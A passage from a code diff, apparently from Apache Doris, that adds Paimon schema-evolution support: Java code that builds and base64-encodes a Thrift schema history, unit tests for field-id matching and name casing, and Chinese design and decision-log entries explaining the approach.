      + */ + private Optional buildSchemaEvolutionParam(Table table) { + if (!(table instanceof FileStoreTable)) { + return Optional.empty(); + } + FileStoreTable fileStoreTable = (FileStoreTable) table; + SchemaManager schemaManager = fileStoreTable.schemaManager(); + + List history = new ArrayList<>(); + // Current/target schema under the -1 sentinel, from the resolved (snapshot-pinned) schema. Its + // top-level names are lowercased: BE keys the table-side StructNode by these names VERBATIM and the + // native reader looks them up by the lowercase Doris slot name (legacy ExternalUtil/parseSchema + // parity). Nested + historical names stay paimon-cased (legacy PaimonUtil.getSchemaInfo). + history.add(buildSchemaInfo(CURRENT_SCHEMA_ID, fileStoreTable.schema().fields(), true)); + // One entry per committed schema id so every native file's schema_id resolves. + for (Long schemaId : schemaManager.listAllIds()) { + history.add(buildSchemaInfo(schemaId, schemaManager.schema(schemaId).fields(), false)); + } + return Optional.of(encodeSchemaEvolution(CURRENT_SCHEMA_ID, history)); + } + + /** + * Serializes the schema dictionary into a base64 TBinaryProtocol blob, carried by a throwaway + * {@link TFileScanRangeParams} (the exact thrift target so {@link #applySchemaEvolutionParam} only + * copies the two fields back). Package-private static for round-trip unit testing. + */ + static String encodeSchemaEvolution(long currentSchemaId, List history) { + TFileScanRangeParams carrier = new TFileScanRangeParams(); + carrier.setCurrentSchemaId(currentSchemaId); + carrier.setHistorySchemaInfo(history); + try { + byte[] bytes = new TSerializer(new TBinaryProtocol.Factory()).serialize(carrier); + return BASE64_ENCODER.encodeToString(bytes); + } catch (Exception e) { + throw new RuntimeException("Failed to serialize paimon schema-evolution info", e); + } + } + + static void applySchemaEvolutionParam(TFileScanRangeParams params, String encoded) { + try { + byte[] bytes = Base64.getDecoder().decode(encoded); + TFileScanRangeParams carrier = new TFileScanRangeParams(); + new TDeserializer(new TBinaryProtocol.Factory()).deserialize(carrier, bytes); + if (carrier.isSetCurrentSchemaId()) { + params.setCurrentSchemaId(carrier.getCurrentSchemaId()); + } + if (carrier.isSetHistorySchemaInfo()) { + params.setHistorySchemaInfo(carrier.getHistorySchemaInfo()); + } + } catch (Exception e) { + throw new RuntimeException("Failed to apply paimon schema-evolution info to scan params", e); + } + } + + /** + * Builds one {@link TSchema} (schema id + root struct) from a paimon schema's top-level fields. + * Port of legacy {@code PaimonUtil.getSchemaInfo(TableSchema)} that emits only what BE's field-id + * matcher consumes ({@code TField.id} / {@code name} / a nested-vs-scalar {@code type.type} tag) — + * no Doris {@code Type} / {@code toColumnTypeThrift} needed (verified against + * {@code be/src/format/table/table_schema_change_helper.cpp}). + * + *

      {@code lowercaseTopLevelNames} lowercases ONLY the top-level field names (not nested struct + * fields) — the legacy-asymmetric casing: the current/target (-1) entry needs lowercase top-level + * names to match the lowercase Doris slot names BE keys by ({@code parseSchema} lowercases top-level), + * while nested struct field names stay paimon-cased ({@code PaimonUtil.paimonTypeToDorisType} keeps + * them) and historical entries are fully paimon-cased.

      + */ + static TSchema buildSchemaInfo(long schemaId, List fields, boolean lowercaseTopLevelNames) { + TSchema tSchema = new TSchema(); + tSchema.setSchemaId(schemaId); + tSchema.setRootField(buildStructField(fields, lowercaseTopLevelNames)); + return tSchema; + } + + private static TStructField buildStructField(List fields, boolean lowercaseNames) { + TStructField structField = new TStructField(); + for (DataField field : fields) { + // Field id + name are the join keys BE uses to match file<->table columns (rename-safe). + // Nested structs are always built paimon-cased (legacy parity) — only this level's names are + // optionally lowercased. + TField tField = buildField(field.type()); + // Default-locale toLowerCase to byte-match the Doris slot names BE looks up — produced the + // same way by PaimonConnectorMetadata column mapping and legacy PaimonUtil.parseSchema (NOT + // Locale.ROOT — that would diverge from the slot names under a non-ROOT JVM default locale). + tField.setName(lowercaseNames ? field.name().toLowerCase() : field.name()); + tField.setId(field.id()); + TFieldPtr fieldPtr = new TFieldPtr(); + fieldPtr.setFieldPtr(tField); + structField.addToFields(fieldPtr); + } + return structField; + } + + private static TField buildField(DataType dataType) { + TField field = new TField(); + field.setIsOptional(dataType.isNullable()); + TColumnType columnType = new TColumnType(); + TNestedField nestedField = new TNestedField(); + switch (dataType.getTypeRoot()) { + case ARRAY: { + columnType.setType(TPrimitiveType.ARRAY); + TArrayField arrayField = new TArrayField(); + TFieldPtr itemPtr = new TFieldPtr(); + itemPtr.setFieldPtr(buildField(((ArrayType) dataType).getElementType())); + arrayField.setItemField(itemPtr); + nestedField.setArrayField(arrayField); + field.setNestedField(nestedField); + break; + } + case MAP: { + columnType.setType(TPrimitiveType.MAP); + MapType mapType = (MapType) dataType; + TMapField mapField = new TMapField(); + TFieldPtr keyPtr = new TFieldPtr(); + keyPtr.setFieldPtr(buildField(mapType.getKeyType())); + mapField.setKeyField(keyPtr); + TFieldPtr valuePtr = new TFieldPtr(); + valuePtr.setFieldPtr(buildField(mapType.getValueType())); + mapField.setValueField(valuePtr); + nestedField.setMapField(mapField); + field.setNestedField(nestedField); + break; + } + case ROW: { + columnType.setType(TPrimitiveType.STRUCT); + // Nested struct field names stay paimon-cased (legacy PaimonUtil.paimonTypeToDorisType). + nestedField.setStructField(buildStructField(((RowType) dataType).getFields(), false)); + field.setNestedField(nestedField); + break; + } + default: + // Scalar: BE reads type.type only as a nested-vs-scalar discriminator (it never inspects + // the specific scalar tag in the field-id path), so a single placeholder is sufficient and + // avoids replicating the full paimon->Doris primitive mapping. + columnType.setType(TPrimitiveType.STRING); + break; + } + field.setType(columnType); + return field; } @Override diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java index 99387a384d29dd..9cdf1b6c43594d 100644 --- a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java @@ -19,6 +19,11 @@ import org.apache.doris.connector.api.ConnectorSession; import org.apache.doris.connector.spi.ConnectorContext; +import org.apache.doris.thrift.TFileScanRangeParams; +import org.apache.doris.thrift.TPrimitiveType; +import org.apache.doris.thrift.schema.external.TField; +import org.apache.doris.thrift.schema.external.TFieldPtr; +import org.apache.doris.thrift.schema.external.TSchema; import org.apache.paimon.catalog.Catalog; import org.apache.paimon.catalog.FileSystemCatalog; @@ -36,6 +41,8 @@ import org.apache.paimon.table.source.DeletionFile; import org.apache.paimon.table.source.RawFile; import org.apache.paimon.table.source.Split; +import org.apache.paimon.types.DataField; +import org.apache.paimon.types.DataType; import org.apache.paimon.types.DataTypes; import org.apache.paimon.types.RowType; import org.apache.paimon.utils.InstantiationUtil; @@ -46,6 +53,7 @@ import java.io.ByteArrayInputStream; import java.nio.charset.StandardCharsets; import java.nio.file.Path; +import java.util.ArrayList; import java.util.Arrays; import java.util.Base64; import java.util.Collections; @@ -650,4 +658,149 @@ public void getScanNodePropertiesNoContextNoStorageProps() { Assertions.assertFalse(scanProps.containsKey("location.AWS_ACCESS_KEY"), "no context -> no normalized overlay"); } + + // ---- FIX-SCHEMA-EVOLUTION (B-1a): native-reader schema dictionary ---- + + @Test + public void buildSchemaInfoCarriesFieldIdsNamesAndScalarTag() { + // WHY (B-1a): BE matches file<->table columns BY paimon field id; the id+name on each top-level + // field are the join keys. Scalars carry a single placeholder tag because BE reads type.type only + // as a nested-vs-scalar discriminator. MUTATION: dropping setId/setName -> ids/names absent -> BE + // can't field-id-match -> falls back to by-name (the silent wrong-rows bug). + List fields = Arrays.asList( + new DataField(7, "id", DataTypes.INT()), + new DataField(9, "name", DataTypes.STRING())); + + TSchema schema = PaimonScanPlanProvider.buildSchemaInfo(3L, fields, false); + + Assertions.assertEquals(3L, schema.getSchemaId()); + List top = schema.getRootField().getFields(); + Assertions.assertEquals(2, top.size()); + Assertions.assertEquals(7, top.get(0).getFieldPtr().getId()); + Assertions.assertEquals("id", top.get(0).getFieldPtr().getName()); + Assertions.assertEquals(TPrimitiveType.STRING, top.get(0).getFieldPtr().getType().getType()); + Assertions.assertEquals(9, top.get(1).getFieldPtr().getId()); + Assertions.assertEquals("name", top.get(1).getFieldPtr().getName()); + } + + @Test + public void buildSchemaInfoNestedShapesAndStructChildIds() { + // WHY (B-1a): the e2e case is a struct-field rename, so STRUCT children MUST carry their own + // paimon ids/names; ARRAY/MAP/STRUCT tags must be exact (BE checks them); array element / map kv + // are matched structurally (no id). MUTATION: wrong nesting tag or missing struct-child id -> BE + // SCHEMA_ERROR or by-name fallback inside nested types. + DataType struct = DataTypes.ROW( + DataTypes.FIELD(10, "f1", DataTypes.INT()), + DataTypes.FIELD(11, "f2", DataTypes.STRING())); + List fields = Arrays.asList( + new DataField(1, "arr", DataTypes.ARRAY(DataTypes.INT())), + new DataField(2, "m", DataTypes.MAP(DataTypes.STRING(), DataTypes.INT())), + new DataField(3, "s", struct)); + + List top = PaimonScanPlanProvider.buildSchemaInfo(0L, fields, false) + .getRootField().getFields(); + + TField arr = top.get(0).getFieldPtr(); + Assertions.assertEquals(TPrimitiveType.ARRAY, arr.getType().getType()); + Assertions.assertEquals(1, arr.getId()); + TField elem = arr.getNestedField().getArrayField().getItemField().getFieldPtr(); + Assertions.assertEquals(TPrimitiveType.STRING, elem.getType().getType()); + Assertions.assertFalse(elem.isSetId(), "array element is matched structurally, not by id"); + + TField map = top.get(1).getFieldPtr(); + Assertions.assertEquals(TPrimitiveType.MAP, map.getType().getType()); + Assertions.assertNotNull(map.getNestedField().getMapField().getKeyField().getFieldPtr()); + Assertions.assertNotNull(map.getNestedField().getMapField().getValueField().getFieldPtr()); + + TField st = top.get(2).getFieldPtr(); + Assertions.assertEquals(TPrimitiveType.STRUCT, st.getType().getType()); + List sub = st.getNestedField().getStructField().getFields(); + Assertions.assertEquals(10, sub.get(0).getFieldPtr().getId()); + Assertions.assertEquals("f1", sub.get(0).getFieldPtr().getName()); + Assertions.assertEquals(11, sub.get(1).getFieldPtr().getId()); + Assertions.assertEquals("f2", sub.get(1).getFieldPtr().getName()); + } + + @Test + public void schemaEvolutionRoundTripAppliesCurrentAndHistory() { + // WHY (B-1a): end-to-end transport — getScanNodeProperties serializes the dictionary, the bridge + // hands it to populateScanLevelParams which sets current_schema_id + history_schema_info on the + // real params. The rename a->new_a keeps field id 0 stable across schema versions, so BE reads the + // renamed column instead of NULL. MUTATION: applySchemaEvolutionParam not copying the fields -> + // params unset -> BE !__isset.history_schema_info -> by-name fallback -> silent wrong rows. + TSchema current = PaimonScanPlanProvider.buildSchemaInfo( + -1L, Arrays.asList(new DataField(0, "new_a", DataTypes.INT())), true); + TSchema schema0 = PaimonScanPlanProvider.buildSchemaInfo( + 0L, Arrays.asList(new DataField(0, "a", DataTypes.INT())), false); + TSchema schema1 = PaimonScanPlanProvider.buildSchemaInfo( + 1L, Arrays.asList(new DataField(0, "new_a", DataTypes.INT())), false); + List history = new ArrayList<>(Arrays.asList(current, schema0, schema1)); + + String encoded = PaimonScanPlanProvider.encodeSchemaEvolution(-1L, history); + TFileScanRangeParams params = new TFileScanRangeParams(); + PaimonScanPlanProvider.applySchemaEvolutionParam(params, encoded); + + Assertions.assertTrue(params.isSetCurrentSchemaId()); + Assertions.assertEquals(-1L, params.getCurrentSchemaId()); + Assertions.assertEquals(3, params.getHistorySchemaInfo().size()); + // id 0 is stable across the rename -> by-id match (rename-safe), not by-name (NULL). + Assertions.assertEquals(0, params.getHistorySchemaInfo().get(1) + .getRootField().getFields().get(0).getFieldPtr().getId()); + Assertions.assertEquals("a", params.getHistorySchemaInfo().get(1) + .getRootField().getFields().get(0).getFieldPtr().getName()); + Assertions.assertEquals(0, params.getHistorySchemaInfo().get(2) + .getRootField().getFields().get(0).getFieldPtr().getId()); + Assertions.assertEquals("new_a", params.getHistorySchemaInfo().get(2) + .getRootField().getFields().get(0).getFieldPtr().getName()); + } + + @Test + public void buildSchemaInfoLowercasesTopLevelButPreservesNestedNames() { + // WHY (BLOCKER): the -1/current entry is the BE table-side StructNode key; BE keys it VERBATIM and + // the native reader looks up the LOWERCASE Doris slot name, so a mixed-case column ("MyCol") must + // be lowercased ("mycol") or BE throws std::out_of_range — regressing even never-evolved reads. + // But nested struct field names must stay paimon-cased (legacy is asymmetric: parseSchema lowers + // top-level, paimonTypeToDorisType keeps nested). MUTATION: no toLowerCase -> "MyCol" key -> crash; + // lowercasing nested too -> "innerfield" diverges from legacy. + DataType struct = DataTypes.ROW(DataTypes.FIELD(5, "InnerField", DataTypes.INT())); + List fields = Arrays.asList( + new DataField(0, "MyCol", DataTypes.INT()), + new DataField(1, "S", struct)); + + List top = PaimonScanPlanProvider.buildSchemaInfo(-1L, fields, true) + .getRootField().getFields(); + + Assertions.assertEquals("mycol", top.get(0).getFieldPtr().getName(), "top-level name lowercased"); + Assertions.assertEquals("s", top.get(1).getFieldPtr().getName(), "top-level name lowercased"); + // nested struct child keeps its paimon casing (legacy parity; matched downstream via to_lower). + Assertions.assertEquals("InnerField", top.get(1).getFieldPtr() + .getNestedField().getStructField().getFields().get(0).getFieldPtr().getName(), + "nested struct field name must stay paimon-cased"); + + // historical entries are fully paimon-cased (the file-side value, BE looks up by id then to_lowers). + List hist = PaimonScanPlanProvider.buildSchemaInfo(0L, fields, false) + .getRootField().getFields(); + Assertions.assertEquals("MyCol", hist.get(0).getFieldPtr().getName(), + "historical entry keeps paimon casing"); + } + + @Test + public void getScanNodePropertiesSkipsSchemaEvolutionForNonFileStoreTable() { + // WHY: only paimon FileStoreTables take the native path; sys-tables / fakes read via JNI and never + // consult history_schema_info. The FileStoreTable guard must skip them (and not NPE / CCE). + // MUTATION: dropping the guard -> ClassCastException / a wrong dictionary emitted for a JNI scan. + FakePaimonTable table = new FakePaimonTable( + "t1", rowType("id"), Collections.emptyList(), Collections.emptyList()); + PaimonTableHandle handle = new PaimonTableHandle( + "db1", "t1", Collections.emptyList(), Collections.emptyList()); + handle.setPaimonTable(table); + PaimonScanPlanProvider provider = new PaimonScanPlanProvider( + new HashMap<>(), new RecordingPaimonCatalogOps()); + + Map scanProps = provider.getScanNodeProperties( + null, handle, Collections.emptyList(), Optional.empty()); + + Assertions.assertFalse(scanProps.containsKey("paimon.schema_evolution"), + "non-DataTable (JNI path) must not emit the native schema dictionary"); + } } diff --git a/plan-doc/01-spi-extensions-rfc.md b/plan-doc/01-spi-extensions-rfc.md index 1a82f500fcdac6..04bc4f552f3c78 100644 --- a/plan-doc/01-spi-extensions-rfc.md +++ b/plan-doc/01-spi-extensions-rfc.md @@ -1309,3 +1309,17 @@ fi **ANONYMOUS-leak 边角(调查→非问题)**:连接器分两步归一化(static 经本缝、vended 经 `vendStorageCredentials`),异于 legacy 的 merge-then-normalize-once。故带静态 object-store endpoint 但**无静态 keys** 的 REST catalog,static overlay 可能发 `AWS_CREDENTIALS_PROVIDER_TYPE=ANONYMOUS`(`AbstractS3CompatibleProperties:124-128` blank-key 支)而 vended overlay(有 keys→无 provider-type)不清它。**BE 证伪无回归**:`s3_util.cpp` 两 provider(`_v1:383-389`/`_v2:448-455`)均**先**查显式 ak/sk 返回 `SimpleAWSCredentialsProvider`,keys 在则永不达 `Anonymous` 支 → vended keys 恒胜。primary B-9 路(静态 catalog **有** keys)provider-type 为 null 不发。 **测**:fe-core `DefaultConnectorContextBackendStoragePropsTest`(真 OSS map → `AWS_*` 存在 + 裸 `oss.access_key` 不存在;无 supplier ctor → 空);连接器 `PaimonScanPlanProviderTest` 3 测(静态裸别名→canonical AWS_*、裸别名不达 BE;vended overlay static collision 胜;无-context 不发存储键)。red-check 反转产线码 2/3 向红。模块 217/0/0(1 CI-gated skip)。live-e2e(私有 S3/OSS 静态凭据 native 读)CI-gated。 + +--- + +## 23. FIX-SCHEMA-EVOLUTION(B-1a):**无新 SPI**(Design C,记录在案) + +> task-list #3 原标「SPI?=yes」(预期穿 `ConnectorColumn`/`ConnectorType` field-id channel + 新 history-schema SPI);**用户签 Design C([D-049](./decisions-log.md))后修正为 `no`** —— 本 fix **零新 SPI surface**,纯连接器侧。记录于此以闭合 RFC「SPI 改动登记」约定(结论:无改动)。 + +**为何无需新 SPI**:BE native field-id 匹配(`be/src/format/table/table_schema_change_helper.cpp:312-430`)每个 `TField` **只**消费 `id` / `name` / `type.type`(且 `type.type` 仅作 nested-vs-scalar 判别——`==MAP/ARRAY/STRUCT` 否则 scalar),**从不读 Doris `Type`/precision/scale,也不读 tuple/slot descriptor**。故连接器可只用 paimon `DataField.{id,name}` + 一个 primitive tag **直建** `TSchema`——`org.apache.doris.thrift.*`(含 `…thrift.schema.external.*`)对连接器 **import-legal**(import-gate 仅禁 `catalog|common|datasource|qe|analysis|nereids|planner`)。 + +**复用既有缝**:`current_schema_id`+`history_schema_info` 经**既有** `ConnectorScanPlanProvider.populateScanLevelParams(TFileScanRangeParams, props)` hook 落 params(连接器在 `getScanNodeProperties` 从 live 表建好、base64 thrift carrier prop 传递、`populateScanLevelParams` 解码套用)。这正是 [DV-006](./deviations-log.md) 为 hudi 同类 schema_id/history 缺口预判的缝(「经现有 SPI hook `populateScanLevelParams`…**无需 fe-core 改动**」)—— paimon 是该模式首个落地者。per-split `TPaimonFileDesc.schema_id` 早已由 `PaimonScanRange` 发出(不改)。 + +**M-10 deferred**:`Column.uniqueId=-1` 不影响 B-1a(history 直接从 paimon field-id 建,不经 Doris 列)→ 不穿 `ConnectorColumn.fieldId`/`ConnectorType` 嵌套 id。详 [DV-026](./deviations-log.md)。 + +**测**:连接器 `PaimonScanPlanProviderTest` +5 测(field-id/name carriage、嵌套 ARRAY/MAP/STRUCT 形 + struct child id、scalar tag、rename round-trip、**-1 entry 顶层 lowercase 而嵌套保 paimon-case**、非-FileStoreTable 跳过)。模块 222/0/0。真值闸=`test_paimon_full_schema_change.groovy`(CI-gated)。 diff --git a/plan-doc/decisions-log.md b/plan-doc/decisions-log.md index d893c70e7e129b..ba4cf690f31436 100644 --- a/plan-doc/decisions-log.md +++ b/plan-doc/decisions-log.md @@ -15,6 +15,7 @@ | 编号 | 别名 | 简述 | 日期 | 状态 | |---|---|---|---|---| +| D-049 | P5-fix#3 | **FIX-SCHEMA-EVOLUTION(B-1a BLOCKER + M-10 MAJOR)= Design C「连接器直建 thrift schema 字典」(用户签字,2026-06-11;M-10 deferred)**:翻闸后 native(ORC/Parquet) 读丢 paimon schema-evolution——连接器只发 per-file `TPaimonFileDesc.schema_id`、从不设 scan 级 `TFileScanRangeParams.current_schema_id`/`history_schema_info` → BE `table_schema_change_helper.h:219-237` 走 `!__isset` 分支退化**名匹配** → schema-evolved(改名/重排)表旧 schema 文件**静默错行/读 NULL**(JNI 路不受影响、native 是默认)。**关键事实**(5 层 trace + BE `table_schema_change_helper.cpp:312-430`):field-id 匹配路 BE 只读 `TField.{id,name,type.type 当 nested-vs-scalar tag}`、**从不读 Doris Type 也不读 tuple descriptor** → 连接器可**直建** `TSchema`(`org.apache.doris.thrift.*` import-legal)、**无需 Doris Type/无新 SPI**;`Column.uniqueId`(M-10) 仅当 FE 从 Doris 列建 history 才有关、直接从 paimon `DataField.id()` 建则 B-1a 独立于 M-10。**用户定 = Design C(vs Design B「穿 ConnectorColumn/ConnectorType field-id + fe-core ExternalUtil 建」)**:连接器在 `getScanNodeProperties` 从 live(snapshot-pinned)表建 `current_schema_id=-1`+`history_schema_info`(-1 entry=pinned schema、外加每个 `SchemaManager.listAllIds()` 提交 schema)→ base64 thrift carrier prop 经既有 `populateScanLevelParams` SPI hook(复用 DV-006 同缝)落 params。**零新 SPI surface**(task-list 原标「SPI?=yes」修正为 no)、连接器局部、最小 blast radius;M-10(`Column.uniqueId=-1`)**deferred**(rereview2 §4 已证伪 standalone repro、无消费者,[DV-026](./deviations-log.md))。**3-lens clean-room review 揪出 2 真 BLOCKER(均在 -1 entry,已修+复验 clean)**:① 列名 casing(BE verbatim key vs lowercase slot name + `current_schema_id=-1` 永不走 ConstNode 快路 → 大小写混合列即崩、连未演化表都回归)→ 修 = -1 entry **只** lowercase 顶层名(default-locale,byte-match slot 产出方+legacy `parseSchema:507`;嵌套 struct 名保 paimon-case=legacy `PaimonUtil:302` 非对称);② 时间旅行(-1 entry 取 `schemaManager.latest()` 绝对最新、但 tuple 用 pinned schema → 改名列崩/错行)→ 修 = -1 entry 取 `((FileStoreTable)table).schema()`(pinned)、guard `DataTable`→`FileStoreTable`。MINOR(eager 读全 schema 无 cache)= 接受的 fail-loud 偏差 [DV-027](./deviations-log.md)。守门:模块 222/0/0(+5 schema-evo UT)、checkstyle 0、import-gate 净。真值闸=`test_paimon_full_schema_change.groovy`(CI-gated)。设计 [`P5-fix-SCHEMA-EVOLUTION-design.md`](./tasks/designs/P5-fix-SCHEMA-EVOLUTION-design.md) | 2026-06-11 | ✅ | | D-048 | P5-fix#2 | **FIX-STATIC-CREDS-BE(B-9 BLOCKER)作用域 = full legacy-parity 替换(用户签字,2026-06-11)**:翻闸后 paimon 连接器 `PaimonScanPlanProvider.getScanNodeProperties:372-381` 把静态 catalog 凭据/配置(`s3.`/`oss.`/`cos.`/`obs.`/`hadoop.`/`fs.`/`dfs.`/`hive.` 前缀)裸拷进 `location.`,fe-core bridge `PluginDrivenScanNode.getLocationProperties` 只剥前缀不归一化 → BE native(FILE_S3) reader 只认 `AWS_ACCESS_KEY`/`AWS_SECRET_KEY`/`AWS_ENDPOINT`/`AWS_REGION`/`AWS_TOKEN`(`s3_util.cpp`)→ 私有桶 native 读拿不到凭据 403。是 review §9.3 凭据**第三道缝**(static→BE-scan,FIX-STORAGE-CREDS 修 catalog FileIO 缝、FIX-REST-VENDED 修 vended 缝,本缝两轮均漏)。legacy `PaimonScanNode.getLocationProperties:650-652` 仅返回 `CredentialUtils.getBackendPropertiesFromStorageMap(storagePropertiesMap)`(canonical map)。**用户定 = 方案 A(full legacy-parity,非窄 object-store-only)**:新 SPI `ConnectorContext.getBackendStorageProperties()`(default 空,仅 paimon 调)= 引擎用 #1 已接线的 `storagePropertiesSupplier`(`catalogProperty.getStoragePropertiesMap()`)跑同一 `getBackendPropertiesFromStorageMap` → 连接器**整段**替换裸拷循环为该 overlay(vended overlay 仍后置、collision 胜,legacy 优先序)。object-store→`AWS_*`;HDFS→canonical(保留用户 `hadoop.`/`dfs.`/`fs.`/`juicefs.` override + 补 legacy 默认 `ipc.client.fallback-to-simple-auth-allowed` 等,**顺修 review §211 MINOR**);丢非-parity `hive.*` 裸键(legacy 本不发 scan location)。一处 SPI 调用替掉前缀循环、单一真相源、无漂移。**ANONYMOUS-leak 边角经 BE 证伪无回归**(`s3_util.cpp` v1:383/v2:448 显式 ak/sk 优先于 `cred_provider_type`,vended keys 在则永不走 Anonymous 支)。无 ctor 改、无连接器新 import(import-gate 净)。SPI RFC §22(E14)。测:fe-core `DefaultConnectorContextBackendStoragePropsTest`(2)+连接器 `PaimonScanPlanProviderTest`(3 改/增,red-check 2/3 向红);模块 217/0/0。设计 [`P5-fix-STATIC-CREDS-BE-design.md`](./tasks/designs/P5-fix-STATIC-CREDS-BE-design.md) | 2026-06-11 | ✅ | | D-039 | P5-D8 | **P5 paimon B4 E7 sys-table SPI 形状 = 复用 live fe-core SysTable 机制(用户签字,2026-06-10)**:RFC §10 的「sys-table 当 `$`-后缀普通表、连接器在 `getTableHandle` 内解析后缀 + `listSysTableSuffixes`」设计**从未落地**——live fe-core 实为 `SysTableResolver`+`NativeSysTable`+`TableIf.getSupportedSysTables/findSysTable`(`BindRelation`/`DescribeCommand`/`ShowCreateTableCommand` 调用;iceberg + legacy-paimon 共用),RFC §10 已 stale。**用户定 = 复用 live 机制(非 RFC §10)**:① 连接器 SPI 加 `ConnectorTableOps.listSupportedSysTables` + `getSysTableHandle`(default no-op,MC/jdbc/es/trino 不受影响);② fe-core `PluginDrivenExternalTable.getSupportedSysTables` 委托连接器(`listSupportedSysTables`),通用 `PluginDrivenSysTable extends NativeSysTable` + `PluginDrivenSysExternalTable`(**报 `PLUGIN_EXTERNAL_TABLE` 非连接器类型**,经现有 `SysTableResolver` 路由到 `PluginDrivenScanNode`)。否决 RFC §10 的 `getTableHandle("$suffix")`-路由(须改 `BindRelation`/`RelationUtil`、大 surface、偏离 iceberg)。RFC §10 标 superseded([DV-023](./deviations-log.md))。**T20(E5 MVCC)置于 B4** = 连接器侧 groundwork(inert until B5 wires fe-core MvccTable 消费者;翻闸 gated on B5 故 inert capability 不达用户,安全)。设计 `tasks/P5-paimon-migration.md` §批次 B4 | 2026-06-10 | ✅ | | D-038 | P5-D2 | **P5 paimon MTMV + MVCC(时间旅行) scope = P5 内实现桥,翻闸 gated on 它(用户签字,design-only)**:SPI 当前 **MTMV 完全无面(E10 缺)**(`PluginDrivenExternalTable:62` 不 implements MTMVRelatedTableIf/MTMVBaseTableIf/MvccTable,框架靠 `instanceof MTMVRelatedTableIf` 分发——`MTMVPartitionUtil:265/497/588`、`StatementContext:987/1003`),E5(MVCC) `defined-no-consumer`(`ConnectorMvccSnapshotAdapter` 仅自身文件引用、`ConnectorScanRange` 无 snapshot 字段)。legacy `PaimonExternalTable:74` 实现全套。翻闸不机械阻断(plain SELECT 经 `getPaimonTable(empty)` 取 latest)但按 MC 样板直接翻闸=**静默回归** paimon-as-MTMV-base + 时间旅行。**用户定 = 方案 A**:P5 内落 fe-core `PaimonPluginDrivenExternalTable extends PluginDrivenExternalTable` 实现三接口 + 首个真 E5 消费者 override `beginQuerySnapshot` 三方法 + 新增 GAP-LISTPART-AT-SNAPSHOT 的 at-snapshot listPartitions;表级 staleness=`ConnectorMvccSnapshot.getSnapshotId()`(-1 空表)、分区级=`ConnectorPartitionInfo.getLastModifiedMillis()`(已存在);MTMV 类型/PartitionItem 留 fe-core、连接器仅供 SPI-neutral 数据。**翻闸(B7) gated on MTMV 桥(B5)**;**禁**静默读 latest。否决 B(翻闸先行 + MTMV fail-loud 延后)。最高 correctness 风险=单-pin 不变式 + `lastFileCreationTime()` 跨 flavor 可靠性(SDK 行为,须 live 验)。设计 `tasks/P5-paimon-migration.md` §开放决策 D2 + recon §3.5/§4 | 2026-06-09 | ✅ | diff --git a/plan-doc/deviations-log.md b/plan-doc/deviations-log.md index 6ee5344c8b03ad..445889a5c51bbb 100644 --- a/plan-doc/deviations-log.md +++ b/plan-doc/deviations-log.md @@ -13,10 +13,12 @@ ## 📋 索引 -> 时间倒序;当前共 **25** 项。 +> 时间倒序;当前共 **27** 项。 | 编号 | 偏差主题 | 原计划位置 | 日期 | 当前状态 | |---|---|---|---|---| +| DV-027 | P5-fix#3 FIX-SCHEMA-EVOLUTION:history_schema_info 用 **eager 全量** `SchemaManager.listAllIds()`+`schema(id)`(每 scan、**无 cache**),非 legacy 的 per-split 引用 schema 懒读+缓存(`PaimonScanNode.putHistorySchemaInfo`→`PaimonUtils.getSchemaCacheValue`)。理由:Design C 的 scan 级缝 `populateScanLevelParams` 拿不到 split 集(那是 `planScan` 才有),故无法只读引用到的 schema;listAllIds() 全集**保证**覆盖任意 native 文件的 `schema_id`(BE `table_schema_change_helper.h:259-263` 缺 entry 会 fail-loud `InternalError`,全集即杜绝)。**两点接受**:① perf——K 个 schema 版本= K 次小 JSON 读/scan(props 每 node 缓存一次、非 per-split);② 鲁棒性微回归——某**未被引用**的 schema-N JSON 瞬时不可读会令本 scan 失败(fail-loud 传播,镜像 legacy `putHistorySchemaInfo` 不吞异常),而 legacy 因只读引用 schema 不碰它、可完成。correctness-safe(全集是 legacy 引用集的超集、绝不触发 BE InternalError);review 评 MINOR。未来优化=引用集(需 split-aware 缝)或连接器侧 cache | [task-list #3](./task-list-P5-rereview2-fixes.md) / [P5-fix-SCHEMA-EVOLUTION 设计](./tasks/designs/P5-fix-SCHEMA-EVOLUTION-design.md) / [D-049](./decisions-log.md) | 2026-06-11 | 🟢 已登记(MINOR perf+鲁棒性,接受 fail-loud)| +| DV-026 | P5-fix#3:**M-10(`Column.uniqueId=-1`)deferred 不修**(task-list #3 原含 M-10)。Design C 直接从 paimon `DataField.id()` 建 `history_schema_info` 的 `TField.id`,B-1a(field-id 匹配)**完全独立于** Doris `Column.uniqueId` → M-10 对 B-1a correctness 无关。rereview2 §4 已 majority-refute M-10 standalone repro(BE field-id 路不读 tuple descriptor、唯一 legacy `Column.uniqueId` 消费者 `ExternalUtil.initSchemaInfo` 经 legacy scan node 翻闸后已死)→ 无 demonstrated user-visible 消费者。故 deferred(非本 fix 必需、Design C 不穿 ConnectorColumn/ConnectorType field-id channel)。**复评触发**:若未来出现 field-id 消费者(如 SPI-on iceberg/hudi 经 `ExternalUtil` 从 Doris 列建 history schema),须重启 M-10(穿 `ConnectorColumn.fieldId`+`ConnectorType` 嵌套 id+`ConnectorColumnConverter.setUniqueId` 递归)| [task-list #3](./task-list-P5-rereview2-fixes.md) / [P5-fix-SCHEMA-EVOLUTION 设计](./tasks/designs/P5-fix-SCHEMA-EVOLUTION-design.md) / [D-049](./decisions-log.md) | 2026-06-11 | 🟢 已登记(M-10 deferred,无消费者)| | DV-025 | P5-fix-FIX-URI-NORMALIZE:`normalizeStorageUri` 用 catalog **静态** `getStoragePropertiesMap()` 做 scheme 归一化,**非** legacy `PaimonScanNode:171` 的 vended-overlay 版(`VendedCredentialsFactory.getStoragePropertiesMapWithVendedCredentials`)。理由:scheme 归一化(oss/cos/obs/s3a→s3、bucket.endpoint→bucket)与 vended 凭据正交——vended 只改 `AWS_*` 键、不改 scheme/bucket 形;只要 warehouse endpoint 静态配置(OSS/COS/OBS 绝大多数情形必配,否则连不上)静态 map 即含该 type entry,归一化与 legacy 等价。唯一分歧 = *纯-vended、无静态存储配* 的 REST catalog:静态 map 可能缺 entry → `LocationPath.of` fail-loud 抛(legacy vended-overlay 版不抛)。该边角**与凭据缝重叠、本 